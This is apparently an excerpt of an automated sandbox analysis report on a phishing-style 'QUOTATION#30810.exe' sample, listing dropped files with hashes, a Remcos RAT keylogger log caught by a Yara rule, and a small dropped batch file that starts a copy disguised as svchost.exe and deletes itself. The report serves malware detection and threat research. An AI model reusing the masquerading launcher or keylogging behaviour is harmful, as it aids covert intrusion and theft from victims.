                                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                                    Entropy (8bit):2.6836101009489046
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:TiZYW09Qh8vYlYFWaHTUYEZtwt8iDEF2hw9Taw1aplaDOZMA9yIBi3:2ZD0VS97GwaplaSMA9VBi3
                                                                                                                                                                                    MD5:FAD37A9E5BF9E7683758F1CA9FAE4766
                                                                                                                                                                                    SHA1:A330CA0514A17B0425903AF5120CD64FD778D954
                                                                                                                                                                                    SHA-256:F52CE14902A0A8308F73816CB8CF46CC267E45C295F78F7421A470A146B8E135
                                                                                                                                                                                    SHA-512:0E9766BE5E0A92760705D0997825144F9A041AAF2D9756326404C48050CEB2363DFE271D73CD329C17C412C8A8A0508B1637C475E07403928753E9363467FA78
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:Mini DuMP crash report, 16 streams, Fri May 3 11:13:58 2024, 0x1205a4 type
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):419146
                                                                                                                                                                                    Entropy (8bit):3.238984029341113
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:i0TtGgJtqBA53QkwqvdmQYaQK4a4yRgmXzlu:/jqOQkwqfXz
                                                                                                                                                                                    MD5:57E0BE5E1DA1195DF88C4DAE24471BB0
                                                                                                                                                                                    SHA1:17A85A4F205A8AB973BB59725C7694DCE11DD37A
                                                                                                                                                                                    SHA-256:0F707384BFD2BD0DAD72950E2D1FDFBE144627207BC48E8AD631E710F1505DFC
                                                                                                                                                                                    SHA-512:14EFCDE04CB3D9EE1FC270C71388632EA0CAFC88822E4B63F15B3FAA416560BE5092CA924B988B8CB790C20D2BFF558F919268D4901EC656A0D8F3BFD31C35BD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:MDMP..a..... .........4f............................4.......$...4.......L...X........J...z..........l.......8...........T...........h*...:...........8...........:..............................................................................eJ......(;......Lw......................T.............4f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8600
                                                                                                                                                                                    Entropy (8bit):3.697803315208351
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:R6l7wVeJQbOTN6Y1cCF+FCgmfZ1Upro89beitfCDKm:R6lXJsIN6YuCF+FCgmfL8e4fCP
                                                                                                                                                                                    MD5:A96B92245623989F74BEC782548381C1
                                                                                                                                                                                    SHA1:17E7FED4D19C3B8EFDD768FA2D6CE837D68E6488
                                                                                                                                                                                    SHA-256:6F76ED9A4EF70918835804A174B5EAB1459E7CFDEF719D82936A3B4ABC49EE9B
                                                                                                                                                                                    SHA-512:668E6FE0F428F6DCD16A981814DC095F65815567A3C9CEE1D28A2723BF995A81C047570A61C618A06D8C47F3389592D228A593AA3615E43D95B8642BDAF3FFF6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.0.8.<./.P.i.
                                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4801
                                                                                                                                                                                    Entropy (8bit):4.490716544153939
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:cvIwWl8zscJg771I9rIWpW8VY2Ym8M4JCsGE6Ftyq8v5GEsYyxGvqeyMd:uIjfaI7ch7VqJCsXqW5XsYyKqeyMd
                                                                                                                                                                                    MD5:8DFF54C55A27993EDB33EE3855AA33B1
                                                                                                                                                                                    SHA1:1A1DEF5993D5CAAFACA04F72805B7C54E8B7F1A7
                                                                                                                                                                                    SHA-256:2AAC76041D450F6D086A54C5A6620AB89CB2EEB48D3FE883CEC8B7058746DAC2
                                                                                                                                                                                    SHA-512:535F5796E3BD93BFBCE37488AD60E37B83FF79605CC7ED4FC54592978B4527FC61C70A9E5B0C66BAA3A9A5592AFC9533B70ECE400D17B8C3F7B406C0D8318644
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306856" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):79550
                                                                                                                                                                                    Entropy (8bit):3.0228806628399663
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:lTIBZtJMLvsmqzFzLX7YBGoPdfiCo/iYOy6BToWmhpaSLubzlZq:lTIBZtJMLvsmqzFzLX7YBGoPdfiCo/i0
                                                                                                                                                                                    MD5:DEC0BB8BC211984C6376DF50B79754C6
                                                                                                                                                                                    SHA1:8D4F47FAF6A00F36C017CFEEF18E999572D5B058
                                                                                                                                                                                    SHA-256:2600E60DB4FB50B0C25571BD2476AD73BEA0B9EA9D1649CBF2E52526136D2E25
                                                                                                                                                                                    SHA-512:A7C0C283A8888108EFD2C46683EF4E620CDE5734881CD4957E31FBAF797DE27A6F26EDF15AE32935265E6C3DD08C8F5C6E3C25007BAB45E53EE7DEC23BA3184E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                                    Entropy (8bit):2.6837214100155475
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:TiZYWuYvCkNPUmauYpY3WQ7HVUYEZegtFipMc20wZ23aRlaRdFM3anxCIfi3:2ZDuYzdu+tSQaRlaJM3anxlfi3
                                                                                                                                                                                    MD5:F3817227351124914AB80844A34E5236
                                                                                                                                                                                    SHA1:0640FAEA50C35D5297C20D8E700FFACD525A9076
                                                                                                                                                                                    SHA-256:ED5B49FA5C5C2FAB9C0610306D04150BADC997E915C403D036DE9AC3D5BDD307
                                                                                                                                                                                    SHA-512:8A1F7626C93BC56F9647978B7202B7753B8C828B08CA77DB330041045B43DD05D94F9B9F84265E2C55BF967AE1D55237FA6E402C4DAB255F819C8301CD273481
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):390
                                                                                                                                                                                    Entropy (8bit):3.354959817973958
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:6llMf4b5YcIeeDAlS1gWAbfyP9hFouNGWRYr21P9hFouNGWRYr21gWAv:6leSecTWDhFiWG2PhFiWG2SW+
                                                                                                                                                                                    MD5:4A6BB1285B626AD5ADB2B39B25419B0A
                                                                                                                                                                                    SHA1:A76A7F719A4575485C37F75D5074ECD2883EE649
                                                                                                                                                                                    SHA-256:94D44802BDCC7638ECFC46559EBB3E23ADCDCDDC5F60099AE779D83BA9B74F45
                                                                                                                                                                                    SHA-512:CED11EE5F13451743E5EC91CB47D01316CF007036CAC3EBB6597A947A410FADC8C3A6226C612330BA528F3B62F830E358F5B809671BB97CBE8D6824589688044
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                    Preview:....[.2.0.2.4./.0.5./.0.3. .1.3.:.1.3.:.3.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.E.n.t.e.r.].........[.C.o.n.n.e.c.t.i.o.n. .M.a.n.a.g.e.r. .P.r.o.f.i.l.e. .I.n.s.t.a.l.l.e.r.].........[.C.o.n.n.e.c.t.i.o.n. .M.a.n.a.g.e.r. .P.r.o.f.i.l.e. .I.n.s.t.a.l.l.e.r.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                    Process:C:\Users\user\Desktop\QUOTATION#30810.exe
                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):654
                                                                                                                                                                                    Entropy (8bit):5.380476433908377
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                                                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                                                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                                                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                                                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1088
                                                                                                                                                                                    Entropy (8bit):5.389928136181357
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/Vcll1qE4GIs0E4KD:MxHKQwYHKGSI6o6+vxp3/ell1qHGIs0K
                                                                                                                                                                                    MD5:7F03B15120D277413D7C08047184C8F5
                                                                                                                                                                                    SHA1:0A6EEC1B9E6BB8FF846D21F7575E78B29C42A00F
                                                                                                                                                                                    SHA-256:18E01DE8BB5C3C111EA89C01A4D28F1834BB02E26C0ECD86D8CCAB3835C79B2C
                                                                                                                                                                                    SHA-512:8995C0BEA34B69FFEEE03FBB332223AB95502938A4789E64CBE8329F596E43C74676FF4550AD4F8506AAF6B955E6F8A5BDEAF1A5B6D71275D265DCE2D5478754
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):965
                                                                                                                                                                                    Entropy (8bit):5.023626250399301
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:tkeknd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qPdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                    MD5:1D705D315B7FECE2D6C13A47EFD128A7
                                                                                                                                                                                    SHA1:32114D761B27C27C3686DC835AAD5E05B6B5A6F3
                                                                                                                                                                                    SHA-256:52729AABEA95E5F9A1C211F9C952B6827328D2AA816B8138048F1691DD638023
                                                                                                                                                                                    SHA-512:28CDA3717CD460797BD65CD6FD9CF79C683DB45DA67D0C1C27C3CDEAFFCEA6541CA36F63BD10C66BC36DA74B1399B9B4AA0A4F0F205C4E1A630BD6886E501148
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9cdd386c, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):15728640
                                                                                                                                                                                    Entropy (8bit):0.1010164436272026
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:uSB2jpSB2jFSjlK/Qw/ZweshzbOlqVqdesWzbYFIeszO/Z5eHW5d:ua6a2UueqkzYRzOW
                                                                                                                                                                                    MD5:249FEB833BF1C58EFC76A82D24633D3B
                                                                                                                                                                                    SHA1:B4AA9A3B2DDC9A6EF5475A8FAACDE445423CECDD
                                                                                                                                                                                    SHA-256:8E7F0BEC4C74B7BE40E4D00DDFBD99FE7FE7D20968BA56F829DEA9444B29B632
                                                                                                                                                                                    SHA-512:84206F5C7EDF45E822A8D269371D54508F33C21000E006084EA38686688EF47F8D5B2A6E018D8D3C9A01BAD2B850161B521CA2E90D83A342F7A09FC65A291F26
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..8l... ...................':...{........................P......"...{#.'"...{..h.R.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................xX.t'"...{...................G1.'"...{...........................#......h.R.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:..
                                                                                                                                                                                    Process:C:\Users\user\Desktop\QUOTATION#30810.exe
                                                                                                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):153
                                                                                                                                                                                    Entropy (8bit):4.985516907666043
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:mKDDCMNqTtvL5oCHyg4EaKC5ZACSmqRDCHyg4E2J5xAInTRILWm5ZPy:hWKqTtT6CHhJaZ5Omq1CHhJ23fTlSk
                                                                                                                                                                                    MD5:249952C87E173A8A8F5537BDF5EB57E9
                                                                                                                                                                                    SHA1:59C6597800534448990CC3B965FCCFB7DB05865D
                                                                                                                                                                                    SHA-256:8960695EA689DCC5EB111B7B0EC49D9EA83707338A73475C851B289F2392975D
                                                                                                                                                                                    SHA-512:9F4BA3E7B7DFF9741AA83081E6303E34D0E119C4729F1292AC3BCAF7BD987A0F93EA2670340AD8C1AF4BC698B9EDE47D6A8BD8FA8CFD8B26B8773B98D1EF8C73
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpDAAA.tmp.bat" /f /q..
                                                                                                                                                                                    Process:C:\Users\user\Desktop\QUOTATION#30810.exe
                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):948209
                                                                                                                                                                                    Entropy (8bit):7.897920022229287
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:aKXqyUcHfHcPviAb/RwFfFTUg6Ak3CYLdN2:hjN0PaAb/RofT6/3CYLW
                                                                                                                                                                                    MD5:C828227DB6D7BC08DD8E9B7313A0E770
                                                                                                                                                                                    SHA1:81A583B2E03AC3A7AD698EF8722FE30D5B67F3AA
                                                                                                                                                                                    SHA-256:9B2562B80E435348CFFE99AD86776E9CEF9B3F2745B170F297DE739FF8D55509
                                                                                                                                                                                    SHA-512:7B8320243D3DF9676A7D4ADFA9703062E8AD636B09DCB55660890ECD2C42C85D7444B228E5FE975EA5EE676E234E6A260A3EE024858477E5F6CCC2E3E186F674
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                    • Antivirus: Virustotal, Detection: 49%, Browse
